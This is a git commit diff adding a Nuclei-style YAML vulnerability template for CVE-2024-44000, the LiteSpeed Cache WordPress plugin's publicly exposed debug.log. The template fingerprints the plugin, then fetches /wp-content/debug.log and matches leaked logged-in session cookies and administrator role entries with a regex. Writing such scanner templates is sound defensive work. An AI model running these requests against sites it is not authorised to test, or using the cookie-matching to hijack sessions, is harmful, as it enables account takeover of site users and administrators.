add CVE-2024-44000
parent
500b429d73
commit
66f48c89a1
|
@ -0,0 +1,73 @@
|
|||
id: CVE-2024-44000
|
||||
|
||||
info:
|
||||
name: LiteSpeed Cache <= 6.4.1 - Sensitive Information Exposure via Log Files
|
||||
author: s4e-io
|
||||
severity: high
|
||||
description: |
|
||||
The LiteSpeed Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.1 through the debug.log file that is publicly exposed. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log file. The log file may contain user cookies making it possible for an attacker to log in with any session that is actively valid and exposed in the log file. Note: the debug feature must be enabled for this to be a concern and this feature is disabled by default.
|
||||
reference:
|
||||
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache/litespeed-cache-641-unauthenticated-sensitive-information-exposure-via-log-files
|
||||
- https://github.com/absholi7ly/CVE-2024-44000-LiteSpeed-Cache
|
||||
- https://thehackernews.com/2024/09/critical-security-flaw-found-in.html
|
||||
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2024-44000
|
||||
cwe-id: CWE-532
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: liteSpeed-technologies
|
||||
product: liteSpeed-cache
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/litespeed-cache"
|
||||
tags: cve,cve2024,info-leak,takeover,wordpress
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "LiteSpeed Cache")'
|
||||
- 'contains(content_type,"text/plain")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
internal: true
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/debug.log HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'get_role: administrator'
|
||||
- 'Set-Cookie'
|
||||
- '_logged_in'
|
||||
- 'expires'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: content_type
|
||||
words:
|
||||
- 'text/plain'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue